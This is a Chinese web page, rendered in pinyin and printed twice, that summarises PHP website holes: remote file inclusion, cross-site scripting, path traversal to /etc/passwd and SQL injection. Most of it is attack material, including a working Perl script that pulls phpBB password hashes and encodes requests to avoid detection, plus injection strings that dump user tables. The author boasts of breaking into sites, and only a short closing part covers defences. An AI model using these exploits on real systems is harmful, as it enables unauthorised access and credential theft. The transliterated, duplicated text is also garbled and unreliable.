| 订阅 | 在线投稿
分享
 
 
当前位置: 王朝网络 >> php >> PHP wang zhan lou dong de xiang guan zong jie

PHP wang zhan lou dong de xiang guan zong jie

2008-12-22 08:10:38 编辑來源:互联网 评论
 
 
 
本文为【PHP网站漏洞的相关总结】的拼音翻译版
  cong xian zai de wang luo an quan lai kan , da jia zui guan zhu he jie chu zui duo de WEB ye mian lou dong ying gai shi ASP le , zai zhe fang mian , xiao zhu shi zhuan jia , wo mei fa yan quan . ran er zai PHP fang mian lai kan , ye tong yang cun zai hen yan chong de an quan wen ti , dan shi zhe fang mian de wen zhang que bu duo . zai zhe li , jiu gen da jia lai shao wei de tao lun yi xia PHP ye mian de xiang guan lou dong ba .
  wo dui mu qian chang jian de PHP lou dong zuo le yi xia zong jie , da zhi fen wei yi xia ji zhong : bao han wen jian lou dong , jiao ben ming ling zhi xing lou dong , wen jian xie lu lou dong ,SQL zhu ru lou dong deng ji zhong . dang ran , zhi yu COOKIE qi pian deng yi bu fen tong yong de ji shu jiu bu zai zhe li tao lun le , zhe xie zi liao wang shang ye hen duo . na me , wo men jiu yi ge yi ge lai fen xi yi xia zen yang li yong zhe xie lou dong ba !
  shou xian , wo men lai tao lun bao han wen jian lou dong . zhe ge lou dong ying gai shuo shi PHP du you de ba . zhe shi you yu bu chong fen chu li wai bu ti gong de e yi shu ju , cong er dao zhi yuan cheng gong ji zhe ke yi li yong zhe xie lou dong yi WEB jin cheng quan xian zai xi tong shang zhi xing ren yi ming ling . wo men lai kan yi ge li zi : jia she zai a.php zhong you zhe yang yi ju dai ma :
  <?php
  include($include.\"/xxx.php\\");
  ?>
  zai zhe duan dai ma zhong ,$include yi ban shi yi ge yi jing she zhi hao de lu jing , dan shi wo men ke yi tong guo zi ji gou zao yi ge lu jing lai da dao gong ji de mu de . bi fang shuo wo men ti jiao :a.php? include=http://web/b.php, zhe ge web shi wo men yong zuo gong ji de kong jian , dang ran ,b.php ye jiu shi wo men yong lai gong ji de dai ma le . wo men ke yi zai b.php zhong xie ru lei si yu :passthru(\"/bin/ls /etc\"); de dai ma . zhe yang , jiu ke yi zhi xing yi xie you mu de de gong ji le .( zhu :web fu wu qi ying gai bu neng zhi xing php dai ma , bu ran jiu chu wen ti le . xiang guan xiang qing ke yi qu kan < < ru he dui PHP cheng xu zhong de chang jian lou dong jin xing gong ji >>). zai zhe ge lou dong fang mian , chu zhuang kuang de hen duo , bi fang shuo :PayPal Store Front,
  HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart deng deng yi xie .
  jie zhe , wo men zai lai kan yi xia jiao ben ming ling zhi xing lou dong . zhe shi you yu dui yong hu ti jiao de URI shen shu que shao chong fen guo lv , ti jiao bao han e yi HTML dai ma de shu ju , ke dao zhi chu fa kua zhan jiao ben gong ji , ke neng huo de mu biao yong hu de min gan xin xi 。 wo men ye ju ge li zi : zai PHP Transparent de PHP PHP 4.3.1 yi xia ban ben zhong de index.php ye mian dui PHPSESSID que shao chong fen de guo lv , wo men ke yi tong guo zhe yang de dai ma lai da dao gong ji de mu de :
http://web/index.php?PHPSESSID="><script>...</script> zai script li mian wo men ke yi gou zao han shu lai huo de yong hu de yi xie min gan xin xi . zai zhe ge lou dong fang mian xiang dui yao shao yi dian , chu le PHP Transparent zhi wai huan you :PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board deng deng .
  zai ran hou , wo men jiu lai kan kan wen jian xie lu lou dong le . zhe zhong lou dong shi you yu dui yong hu ti jiao shen shu que shao chong fen guo lv , yuan cheng gong ji zhe ke yi li yong ta jin xing mu lu bian li gong ji yi ji huo qu yi xie min gan xin xi 。 wo men na zui jin fa xian de phpMyAdmin lai zuo li zi . zai phpMyAdmin zhong ,export.php ye mian mei you dui yong hu ti jiao de 'what' shen shu jin xing chong fen guo lv , yuan cheng gong ji zhe ti jiao bao han duo ge '../' zi fu de shu ju , bian ke rao guo WEB ROOT xian zhi , yi WEB quan xian cha kan xi tong shang de ren yi wen jian xin xi 。 bi fang shuo da ru zhe yang yi ge di zhi :export.php?what=../../../../../.. /etc/passwd%00 jiu ke yi da dao wen jian xie lu de mu de le . zai zhe fang mian xiang dui duo yi dian , you :myPHPNuke,McNews deng deng .
  zui hou , wo men you yao hui dao zui xing fen de di fang le . xiang xiang wo men ping shi zai asp ye mian zhong yong SQL zhu ru you duo me shuang , yi qian huan yao shou dong zhu ru , yi zhi dao xiao zhu wu chu \"SQL zhu ru mi ji \"( hei hei ), ran hou zai kai zuo chu NBSI yi hou , wo men NB lian meng zhen shi la chu yi pian tian kong . zeng xian hou bang CSDN, da fu weng lun tan , zhong guo pin dao deng da xing wang zhan zhao chu lou dong .( zhe xie fei hua bu duo shuo le , you dian pao ti le ...). huan shi yan gui zheng chuan , qi shi zai asp zhong SQL de zhu ru he php zhong de SQL zhu ru da zhi xiang tong , zhi bu guo shao wei zhu yi yi xia yong de ji ge han shu jiu hao le . jiang asc gai cheng ASCII,len gai cheng LENGTH, qi ta han shu ji ben bu bian le . qi shi da jia kan dao PHP de SQL zhu ru , shi bu shi dou hui xiang dao PHP-NUKE he PHPBB ne ? bu cuo , su hua shuo shu da zhao fen , xiang dong wang zhe yang de lun tan zai asp jie jiu gai shi lou dong zhe wang le , zhe bing bu shi shuo ta de lun tan an quan tai cha , er shi ming qi tai xiang , bie ren yong de duo le , yan jiu de ren ye jiu duo le , fa xian de an quan lou dong ye jiu yue duo le .PHPBB ye shi yi yang de , xian zai hen da yi bu fen ren yong PHP zuo lun tan de hua , yi ban dou shi xuan ze le PHPBB. ta de lou dong ye shi yi zhi zai chu , cong zui zao phpBB.com phpBB 1.4.0 ban ben bei ren fa xian lou dong , dao xian zai zui jin de phpBB 2.0.6 ban ben de groupcp.php, yi ji zhi qian fa xian de search.php,profile.php,viewtopic.php deng deng jia qi lai , da gai ye you shi lai ge yang zi ba . zhe ye yi zhi dao zhi , yi bu fen ren zai yan jiu php lou dong de shi hou dou hui na ta zuo shi yan pin , suo wei bai lian cheng jing ma , xiang xin yi hou de PHPBB hui yue lai yue hao .
  hao le , wo men huan shi lai fen xi yi xia lou dong chan sheng de yuan yin ba . na viewtopic.php ye mian lai shuo , you yu zai tiao yong viewtopic.php shi , zhi jie cong GET qing qiu zhong huo de \"topic_id\" bing chuan di gei SQL cha xun ming ling , er bing mei you jin xing yi xie guo lv de chu li , gong ji zhe ke yi ti jiao te shu de SQL zi fu chuan yong yu huo de MD5 mi ma , huo de ci mi ma xin xi ke yi yong yu zi dong deng lu huo zhe jin xing bao li po jie 。( wo xiang ying gai bu hui you ren xiang qu bao li po jie ba , chu fei you te bie chong yao de yuan yin ). xian kan yi xia xiang guan yuan dai ma :
  # if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
  # {
  # $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
  # }
  # else if ( isset($HTTP_GET_VARS['topic']) )
  # {
  # $topic_id = intval($HTTP_GET_VARS['topic']);
  # }
  cong shang mian wo men ke yi kan chu , ru guo ti jiao de view=newest bing qie sid she zhi le zhi de hua , zhi xing de cha xun dai ma xiang xia mian de zhe ge yang zi ( ru guo ni huan mei kan guo PHPBB yuan dai ma de hua , jian yi ni kan le zai dui zhe zhe li lai kan , shou ying xiang xi tong wei :phpBB 2.0.5 he phpBB 2.0.4).
  # $sql = \"select p.post_id
  # FROM \" . POSTS_TABLE . \" p, \" . SESSIONS_TABLE . \" s, \" . USERS_TABLE . \" u
  # where s.session_id = '$session_id'
  # AND u.user_id = s.session_user_id
  # AND p.topic_id = $topic_id
  # AND p.post_time >= u.user_lastvisit
  # ORDER BY p.post_time ASC
  # LIMIT 1\";
  Rick ti gong le xia mian de zhe duan ce shi dai ma :
  use IO::Socket;
  $remote = shift || 'localhost';
  $view_topic = shift || '/phpBB2/viewtopic.php';
  $uid = shift || 2;
  $port = 80;
  $dbtype = 'mysql4'; # mysql4 or pgsql
  print \"Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n\";
  $p = \"\";
  for($index=1; $index<=32; $index++) {
  $socket = IO::Socket::INET->new(PeerAddr => $remote,
  PeerPort => $port,
  Proto => \"tcp\",
  Type => SOCK_STREAM)
  or die \"Couldnt connect to $remote:$port :$@\n\";
  $str = \"GET $view_topic\" . \"?sid=1&topic_id=-1\" . random_encode(make_dbsql()) . \"&view=newest\" . \" HTTP/1.0\n\n\";
  print $socket $str;
  print $socket \"Cookie: phpBB2mysql_sid=1\n\"; # replace this for pgsql or remove it
  print $socket \"Host: $remote\n\n\";
  while ($answer = <$socket>) {
  if ($answer =~ /location:.*\x23(\d+)/) # Matches the location: viewtopic.php?p=<num>#<num> {
  $p .= chr ();
  }
  }
  close($socket);
  }
  print \"\nMD5 Hash for uid $uid is $p\n\";
  # random encode str. helps avoid detection
  sub random_encode {
  $str = shift;
  $ret = \"\";
  for($i=0; $i<length($str); $i++) {
  $c = substr($str,$i,1);
  $j = rand length($str) * 1000;
  if (int($j) % 2 || $c eq ' ') {
  $ret .= \"%\" . sprintf(\"%x\",ord($c));
  } else {
  $ret .= $c;
  }
  }
  return $ret;
  }
  sub make_dbsql {
  if ($dbtype eq 'mysql4') {
  return \" union select ord(substring(user_password,\" . $index . \",1)) from phpbb_users where user_id=$uid/*\" ;
  } elsif ($dbtype eq 'pgsql') {
  return \"; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false\";
  } else {
  return \"\";
  }
  }
  zhe duan dai ma , wo jiu bu duo zuo jie shi le . zuo yong shi huo de HASH zhi .
  kan dao zhe li , da jia ke neng you dian yi wen , wei shen me wo qian mian jiang de na xie gai de han shu zen me mei you yong dao , wo jiang chu lai bu pa da jia xiao hua : qi shi wang shang hen duo zhan dian you xie ye mian de cha xun yu ju kan qi lai hui shi zhe yang :
  display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc
  bu yao xiao , zhe shi zhen de , wo huan kao zhe ge jin guo ji ge da xing wang zhan . zhi yu na yi xie , bu hao jiang chu lai , bu guo wo men xue xiao de wang zhan , wo jiu shi kao zhe ge jin hou tai de ( xi wang xue xiao wang luo zhong xin de kan bu dao zhe pian wen zhang ,^_^). ba qian mian na han shu yong shang ba . bu ran ni zhi you gai ren jia de mi ma le o !!!
  cha dian wang le yi dian , zai SQL zhu ru de shi hou ,PHP yu ASP you suo bu tong ,mysql dui sql yu ju de yun yong mei you mssql ling huo , yin ci , hen duo zai mssql shang ke yi yong de cha xun yu ju zai mysql shu ju ku zhong dou bu neng zou xiao le . yi ban wo men chang jian de zhu ru yu ju xiang zhe yang :aaa.php?id=a' into outfile 'pass.txt huo shi aaa.php?id=a' into outfile 'pass.txt' /* zai jin yi bu ke yi gai cheng :aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt zhong
  zhe yang ke yi jiang shu ju ku shu ju dao chu wei wen jian , ran hou ke yi cha kan .
  huo shi zhe yang :mode=',user_level='4
  zhe ge yu ju yi ban yong zai xiu gai zi liao shi , jia she ye mian cun zai lou dong de hua , jiu ke yi da dao ti sheng quan xian de zuo yong .
  qi ta de ru ' OR 1=1 -- huo zhe :1' or 1='1 ze gen asp cha bu duo . zhe li bu duo jiang le . zai php li mian ,SQL zhu ru kan lai huan shi lou dong zhi shou a , you tai duo de ye mian cun zai zhe ge wen ti le .
  qi shi da jia ke yi kan chu lai , shang mian na xie fen lei gui gen jie di zhi you yi ge yuan yin : ti jiao shen shu mei guo lv huo shi guo lv bu gou yan jin . hei ke fang xian xiang lai you gong you shou . zhe li , jiu da zhi jiang yi xia fang fan de fang fa ba .
  shou xian , wo ge ren ren wei zui chong yao de yi dian shi jiang magic_quotes_gpc gao wei ON, ta de zuo yong shi jiang dan yin hao , shuang yin hao , fan xie xian , he kong zi fu zhuan huan wei han you fan xie xian de zi fu , ru select * from admin where username='$username' and password='$password' yu ju , gong ji zhe xiang yong 1' or 1='1 tiao guo yan zheng , dan shi , na xie zi fu chuan jiang bei zhuan huan cheng zhe yang :select * from admin where username='a' and password='1\' or 1=\'1' cong er da dao zu zhi zhu ru de mu de , shi shi ye jiu shi zi dong jin xing le addslashes() cao zuo . zai bu xing de hua , zi ji ding yi han shu chu li ba . xian zai kan lai , na xie gao PHP zhu ru de ren ye bi jiao yu men , yin wei myslq4 yi xia ban ben bu zhi chi zi yu ju , er xin ban ben de mysql you hui jiang magic_quotes_gpc xuan xiang mo ren wei kai .
  jie jue bao han wen jian lou dong yong de fang fa jiu shi : yao qiu cheng xu yuan bao han wen jian li de shen shu jin liang bu yao shi yong bian liang , ru guo shi yong bian liang , jiu yi ding yao yan ge jian cha yao bao han de wen jian ming , jue dui bu neng you yong hu ren yi zhi ding , jian yi she global_variables wei off。 ru qian mian wen jian da kai zhong xian zhi PHP cao zuo lu jing shi yi ge bi yao de xuan xiang 。 ling wai , ru fei te shu xu yao , yi ding yao guan bi PHP de yuan cheng wen jian da kai gong neng 。 xiu gai php.ini wen jian :allow_url_fopen = Off( zhu : shen jian <<PHP an quan wen ti : yuan cheng yi chu 、DoS、safe_mode rao guo lou dong >>).【原文】【汉音对照
 
 
 
 
 
 
 
 
 
日版宠物情人插曲《Winding Road》歌词

日版宠物情人2017的插曲,很带节奏感,日语的,女生唱的。 最后听见是在第8集的时候女主手割伤了,然后男主用嘴帮她吸了一下,插曲就出来了。 歌手:Def...

兄弟共妻,我成了他们夜里的美食

老钟家的两个儿子很特别,就是跟其他的人不太一样,魔一般的执着。兄弟俩都到了要结婚的年龄了,不管自家老爹怎么磨破嘴皮子,兄弟俩说不娶就不娶,老父母为兄弟两操碎了心...

如何磨出破洞牛仔裤?牛仔裤怎么剪破洞?

把牛仔裤磨出有线的破洞 1、具体工具就是磨脚石,下面垫一个硬物,然后用磨脚石一直磨一直磨,到把那块磨薄了,用手撕开就好了。出来的洞啊很自然的。需要猫须的话调几...

我就是扫描下图得到了敬业福和爱国福

先来看下敬业福和爱国福 今年春节,支付宝再次推出了“五福红包”活动,表示要“把欠大家的敬业福都还给大家”。 今天该活动正式启动,和去年一样,需要收集“五福”...

冰箱异味产生的原因和臭味去除的方法

有时候我们打开冰箱就会闻到一股异味,冰箱里的这种异味是因为一些物质发出的气味的混合体,闻起来让人恶心。 产生这些异味的主要原因有以下几点。 1、很多人有这种习...

 
 
cong xian zai de wang luo an quan lai kan , da jia zui guan zhu he jie chu zui duo de WEB ye mian lou dong ying gai shi ASP le , zai zhe fang mian , xiao zhu shi zhuan jia , wo mei fa yan quan . ran er zai PHP fang mian lai kan , ye tong yang cun zai hen yan chong de an quan wen ti , dan shi zhe fang mian de wen zhang que bu duo . zai zhe li , jiu gen da jia lai shao wei de tao lun yi xia PHP ye mian de xiang guan lou dong ba . wo dui mu qian chang jian de PHP lou dong zuo le yi xia zong jie , da zhi fen wei yi xia ji zhong : bao han wen jian lou dong , jiao ben ming ling zhi xing lou dong , wen jian xie lu lou dong ,SQL zhu ru lou dong deng ji zhong . dang ran , zhi yu COOKIE qi pian deng yi bu fen tong yong de ji shu jiu bu zai zhe li tao lun le , zhe xie zi liao wang shang ye hen duo . na me , wo men jiu yi ge yi ge lai fen xi yi xia zen yang li yong zhe xie lou dong ba ! shou xian , wo men lai tao lun bao han wen jian lou dong . zhe ge lou dong ying gai shuo shi PHP du you de ba . zhe shi you yu bu chong fen chu li wai bu ti gong de e yi shu ju , cong er dao zhi yuan cheng gong ji zhe ke yi li yong zhe xie lou dong yi WEB jin cheng quan xian zai xi tong shang zhi xing ren yi ming ling . wo men lai kan yi ge li zi : jia she zai a.php zhong you zhe yang yi ju dai ma : <?php include($include.\"/xxx.php\\"); ?> zai zhe duan dai ma zhong ,$include yi ban shi yi ge yi jing she zhi hao de lu jing , dan shi wo men ke yi tong guo zi ji gou zao yi ge lu jing lai da dao gong ji de mu de . bi fang shuo wo men ti jiao :a.php? include=http://web/b.php, zhe ge web shi wo men yong zuo gong ji de kong jian , dang ran ,b.php ye jiu shi wo men yong lai gong ji de dai ma le . wo men ke yi zai b.php zhong xie ru lei si yu :passthru(\"/bin/ls /etc\"); de dai ma . zhe yang , jiu ke yi zhi xing yi xie you mu de de gong ji le .( zhu :web fu wu qi ying gai bu neng zhi xing php dai ma , bu ran jiu chu wen ti le . xiang guan xiang qing ke yi qu kan < < ru he dui PHP cheng xu zhong de chang jian lou dong jin xing gong ji >>). zai zhe ge lou dong fang mian , chu zhuang kuang de hen duo , bi fang shuo :PayPal Store Front, HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart deng deng yi xie . jie zhe , wo men zai lai kan yi xia jiao ben ming ling zhi xing lou dong . zhe shi you yu dui yong hu ti jiao de URI shen shu que shao chong fen guo lv , ti jiao bao han e yi HTML dai ma de shu ju , ke dao zhi chu fa kua zhan jiao ben gong ji , ke neng huo de mu biao yong hu de min gan xin xi 。 wo men ye ju ge li zi : zai PHP Transparent de PHP PHP 4.3.1 yi xia ban ben zhong de index.php ye mian dui PHPSESSID que shao chong fen de guo lv , wo men ke yi tong guo zhe yang de dai ma lai da dao gong ji de mu de : [url=http://web/index.php?PHPSESSID=\]http://web/index.php?PHPSESSID=\"><script>...</script[/url]> zai script li mian wo men ke yi gou zao han shu lai huo de yong hu de yi xie min gan xin xi . zai zhe ge lou dong fang mian xiang dui yao shao yi dian , chu le PHP Transparent zhi wai huan you :PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board deng deng . zai ran hou , wo men jiu lai kan kan wen jian xie lu lou dong le . zhe zhong lou dong shi you yu dui yong hu ti jiao shen shu que shao chong fen guo lv , yuan cheng gong ji zhe ke yi li yong ta jin xing mu lu bian li gong ji yi ji huo qu yi xie min gan xin xi 。 wo men na zui jin fa xian de phpMyAdmin lai zuo li zi . zai phpMyAdmin zhong ,export.php ye mian mei you dui yong hu ti jiao de 'what' shen shu jin xing chong fen guo lv , yuan cheng gong ji zhe ti jiao bao han duo ge '../' zi fu de shu ju , bian ke rao guo WEB ROOT xian zhi , yi WEB quan xian cha kan xi tong shang de ren yi wen jian xin xi 。 bi fang shuo da ru zhe yang yi ge di zhi :export.php?what=../../../../../.. /etc/passwd%00 jiu ke yi da dao wen jian xie lu de mu de le . zai zhe fang mian xiang dui duo yi dian , you :myPHPNuke,McNews deng deng . zui hou , wo men you yao hui dao zui xing fen de di fang le . xiang xiang wo men ping shi zai asp ye mian zhong yong SQL zhu ru you duo me shuang , yi qian huan yao shou dong zhu ru , yi zhi dao xiao zhu wu chu \"SQL zhu ru mi ji \"( hei hei ), ran hou zai kai zuo chu NBSI yi hou , wo men NB lian meng zhen shi la chu yi pian tian kong . zeng xian hou bang CSDN, da fu weng lun tan , zhong guo pin dao deng da xing wang zhan zhao chu lou dong .( zhe xie fei hua bu duo shuo le , you dian pao ti le ...). huan shi yan gui zheng chuan , qi shi zai asp zhong SQL de zhu ru he php zhong de SQL zhu ru da zhi xiang tong , zhi bu guo shao wei zhu yi yi xia yong de ji ge han shu jiu hao le . jiang asc gai cheng ASCII,len gai cheng LENGTH, qi ta han shu ji ben bu bian le . qi shi da jia kan dao PHP de SQL zhu ru , shi bu shi dou hui xiang dao PHP-NUKE he PHPBB ne ? bu cuo , su hua shuo shu da zhao fen , xiang dong wang zhe yang de lun tan zai asp jie jiu gai shi lou dong zhe wang le , zhe bing bu shi shuo ta de lun tan an quan tai cha , er shi ming qi tai xiang , bie ren yong de duo le , yan jiu de ren ye jiu duo le , fa xian de an quan lou dong ye jiu yue duo le .PHPBB ye shi yi yang de , xian zai hen da yi bu fen ren yong PHP zuo lun tan de hua , yi ban dou shi xuan ze le PHPBB. ta de lou dong ye shi yi zhi zai chu , cong zui zao phpBB.com phpBB 1.4.0 ban ben bei ren fa xian lou dong , dao xian zai zui jin de phpBB 2.0.6 ban ben de groupcp.php, yi ji zhi qian fa xian de search.php,profile.php,viewtopic.php deng deng jia qi lai , da gai ye you shi lai ge yang zi ba . zhe ye yi zhi dao zhi , yi bu fen ren zai yan jiu php lou dong de shi hou dou hui na ta zuo shi yan pin , suo wei bai lian cheng jing ma , xiang xin yi hou de PHPBB hui yue lai yue hao . hao le , wo men huan shi lai fen xi yi xia lou dong chan sheng de yuan yin ba . na viewtopic.php ye mian lai shuo , you yu zai tiao yong viewtopic.php shi , zhi jie cong GET qing qiu zhong huo de \"topic_id\" bing chuan di gei SQL cha xun ming ling , er bing mei you jin xing yi xie guo lv de chu li , gong ji zhe ke yi ti jiao te shu de SQL zi fu chuan yong yu huo de MD5 mi ma , huo de ci mi ma xin xi ke yi yong yu zi dong deng lu huo zhe jin xing bao li po jie 。( wo xiang ying gai bu hui you ren xiang qu bao li po jie ba , chu fei you te bie chong yao de yuan yin ). xian kan yi xia xiang guan yuan dai ma : # if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) ) # { # $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]); # } # else if ( isset($HTTP_GET_VARS['topic']) ) # { # $topic_id = intval($HTTP_GET_VARS['topic']); # } cong shang mian wo men ke yi kan chu , ru guo ti jiao de view=newest bing qie sid she zhi le zhi de hua , zhi xing de cha xun dai ma xiang xia mian de zhe ge yang zi ( ru guo ni huan mei kan guo PHPBB yuan dai ma de hua , jian yi ni kan le zai dui zhe zhe li lai kan , shou ying xiang xi tong wei :phpBB 2.0.5 he phpBB 2.0.4). # $sql = \"select p.post_id # FROM \" . POSTS_TABLE . \" p, \" . SESSIONS_TABLE . \" s, \" . USERS_TABLE . \" u # where s.session_id = '$session_id' # AND u.user_id = s.session_user_id # AND p.topic_id = $topic_id # AND p.post_time >= u.user_lastvisit # ORDER BY p.post_time ASC # LIMIT 1\"; Rick ti gong le xia mian de zhe duan ce shi dai ma : use IO::Socket; $remote = shift || 'localhost'; $view_topic = shift || '/phpBB2/viewtopic.php'; $uid = shift || 2; $port = 80; $dbtype = 'mysql4'; # mysql4 or pgsql print \"Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n\"; $p = \"\"; for($index=1; $index<=32; $index++) { $socket = IO::Socket::INET->new(PeerAddr => $remote, PeerPort => $port, Proto => \"tcp\", Type => SOCK_STREAM) or die \"Couldnt connect to $remote:$port :$@\n\"; $str = \"GET $view_topic\" . \"?sid=1&topic_id=-1\" . random_encode(make_dbsql()) . \"&view=newest\" . \" HTTP/1.0\n\n\"; print $socket $str; print $socket \"Cookie: phpBB2mysql_sid=1\n\"; # replace this for pgsql or remove it print $socket \"Host: $remote\n\n\"; while ($answer = <$socket>) { if ($answer =~ /location:.*\x23(\d+)/) # Matches the location: viewtopic.php?p=<num>#<num> { $p .= chr (); } } close($socket); } print \"\nMD5 Hash for uid $uid is $p\n\"; # random encode str. helps avoid detection sub random_encode { $str = shift; $ret = \"\"; for($i=0; $i<length($str); $i++) { $c = substr($str,$i,1); $j = rand length($str) * 1000; if (int($j) % 2 || $c eq ' ') { $ret .= \"%\" . sprintf(\"%x\",ord($c)); } else { $ret .= $c; } } return $ret; } sub make_dbsql { if ($dbtype eq 'mysql4') { return \" union select ord(substring(user_password,\" . $index . \",1)) from phpbb_users where user_id=$uid/*\" ; } elsif ($dbtype eq 'pgsql') { return \"; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false\"; } else { return \"\"; } } zhe duan dai ma , wo jiu bu duo zuo jie shi le . zuo yong shi huo de HASH zhi . kan dao zhe li , da jia ke neng you dian yi wen , wei shen me wo qian mian jiang de na xie gai de han shu zen me mei you yong dao , wo jiang chu lai bu pa da jia xiao hua : qi shi wang shang hen duo zhan dian you xie ye mian de cha xun yu ju kan qi lai hui shi zhe yang : display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc bu yao xiao , zhe shi zhen de , wo huan kao zhe ge jin guo ji ge da xing wang zhan . zhi yu na yi xie , bu hao jiang chu lai , bu guo wo men xue xiao de wang zhan , wo jiu shi kao zhe ge jin hou tai de ( xi wang xue xiao wang luo zhong xin de kan bu dao zhe pian wen zhang ,^_^). ba qian mian na han shu yong shang ba . bu ran ni zhi you gai ren jia de mi ma le o !!! cha dian wang le yi dian , zai SQL zhu ru de shi hou ,PHP yu ASP you suo bu tong ,mysql dui sql yu ju de yun yong mei you mssql ling huo , yin ci , hen duo zai mssql shang ke yi yong de cha xun yu ju zai mysql shu ju ku zhong dou bu neng zou xiao le . yi ban wo men chang jian de zhu ru yu ju xiang zhe yang :aaa.php?id=a' into outfile 'pass.txt huo shi aaa.php?id=a' into outfile 'pass.txt' /* zai jin yi bu ke yi gai cheng :aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt zhong zhe yang ke yi jiang shu ju ku shu ju dao chu wei wen jian , ran hou ke yi cha kan . huo shi zhe yang :mode=',user_level='4 zhe ge yu ju yi ban yong zai xiu gai zi liao shi , jia she ye mian cun zai lou dong de hua , jiu ke yi da dao ti sheng quan xian de zuo yong . qi ta de ru ' OR 1=1 -- huo zhe :1' or 1='1 ze gen asp cha bu duo . zhe li bu duo jiang le . zai php li mian ,SQL zhu ru kan lai huan shi lou dong zhi shou a , you tai duo de ye mian cun zai zhe ge wen ti le . qi shi da jia ke yi kan chu lai , shang mian na xie fen lei gui gen jie di zhi you yi ge yuan yin : ti jiao shen shu mei guo lv huo shi guo lv bu gou yan jin . hei ke fang xian xiang lai you gong you shou . zhe li , jiu da zhi jiang yi xia fang fan de fang fa ba . shou xian , wo ge ren ren wei zui chong yao de yi dian shi jiang magic_quotes_gpc gao wei ON, ta de zuo yong shi jiang dan yin hao , shuang yin hao , fan xie xian , he kong zi fu zhuan huan wei han you fan xie xian de zi fu , ru select * from admin where username='$username' and password='$password' yu ju , gong ji zhe xiang yong 1' or 1='1 tiao guo yan zheng , dan shi , na xie zi fu chuan jiang bei zhuan huan cheng zhe yang :select * from admin where username='a' and password='1\' or 1=\'1' cong er da dao zu zhi zhu ru de mu de , shi shi ye jiu shi zi dong jin xing le addslashes() cao zuo . zai bu xing de hua , zi ji ding yi han shu chu li ba . xian zai kan lai , na xie gao PHP zhu ru de ren ye bi jiao yu men , yin wei myslq4 yi xia ban ben bu zhi chi zi yu ju , er xin ban ben de mysql you hui jiang magic_quotes_gpc xuan xiang mo ren wei kai . jie jue bao han wen jian lou dong yong de fang fa jiu shi : yao qiu cheng xu yuan bao han wen jian li de shen shu jin liang bu yao shi yong bian liang , ru guo shi yong bian liang , jiu yi ding yao yan ge jian cha yao bao han de wen jian ming , jue dui bu neng you yong hu ren yi zhi ding , jian yi she global_variables wei off。 ru qian mian wen jian da kai zhong xian zhi PHP cao zuo lu jing shi yi ge bi yao de xuan xiang 。 ling wai , ru fei te shu xu yao , yi ding yao guan bi PHP de yuan cheng wen jian da kai gong neng 。 xiu gai php.ini wen jian :allow_url_fopen = Off( zhu : shen jian <<PHP an quan wen ti : yuan cheng yi chu 、DoS、safe_mode rao guo lou dong >>).
󰈣󰈤
  免责声明:本文仅代表作者个人观点,与王朝网络无关。王朝网络登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述,其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
时尚秀气模特裴裴(8)
时尚秀气模特裴裴(7)
时尚秀气模特裴裴(6)
时尚秀气模特裴裴(5)
白墙黑瓦
广州东郊[原创]
八美至丹巴的东谷天然盆景
不一样的
 
>>返回首页<<
 
 
 为你推荐
 
 
 
 转载本文
 UBB代码 HTML代码
复制到剪贴板...
 
 热帖排行
 
 
 
 
 
©2005- 王朝网络 版权所有